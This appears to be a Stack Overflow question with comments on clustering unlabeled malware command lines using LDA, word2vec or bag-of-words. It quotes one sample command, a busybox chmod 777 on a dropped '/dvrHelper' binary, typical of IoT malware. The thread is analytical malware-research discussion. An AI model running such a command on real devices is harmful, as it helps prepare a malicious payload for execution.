0

How can I cluster commands such as /bin/busybox chmod 777 /dvrHelper without using Bag-Of-Words representation? Models like LDA or Word2vec could be useful for my goal?

Fritz
  • 1
  • can you show your work, sample code? – Mark Mar 22 '20 at 14:55
  • Did you try bag-of-words and get unsatisfactory results? What sort of commands do you expect to cluster-together, for what ultimate benefits? – gojomo Mar 23 '20 at 01:58
  • I have a dataset that contains like 10.000 rows. In each row there are commands like the one that I wrote above (commands from different types of malware). My goal is to cluster them (observations are not labeled). I don't think Bag-of-Words would be a good choice, it doesn't consider the importance of each single word and the order – Fritz Mar 23 '20 at 12:30
  • Neither word2vec nor LDA are influenced much (or at all) by word-order, either. Having a hunch that a simple (& easy-to-apply) method like bag-of-words (or bag-of-character-ngrams) wouldn't be good is a random guess in the dark. Trying it, seeing what it does, where it might offer insights & where it misses similarities you might know to be important would be a step towards choosing further techniques. (If you have desired associations you'd like a technique to discover, but doesn't, you can then more clearly think: "what kind of info might help cluster these in the way I'd like?") – gojomo Mar 23 '20 at 22:23
  • Also: merely 10k examples of perhaps 2-10 tokens each, is very very tiny for any kind of word2vec training, and the examples are tiny for LDA. But you could still try them, to see if there are any interesting results – with a dataset that tiny you can run many experiments in a small amount of time! Also, having *only* command-lines from malware may be less interesting than also including non-malware command-lines for contrast. – gojomo Mar 23 '20 at 22:25

0 Answers0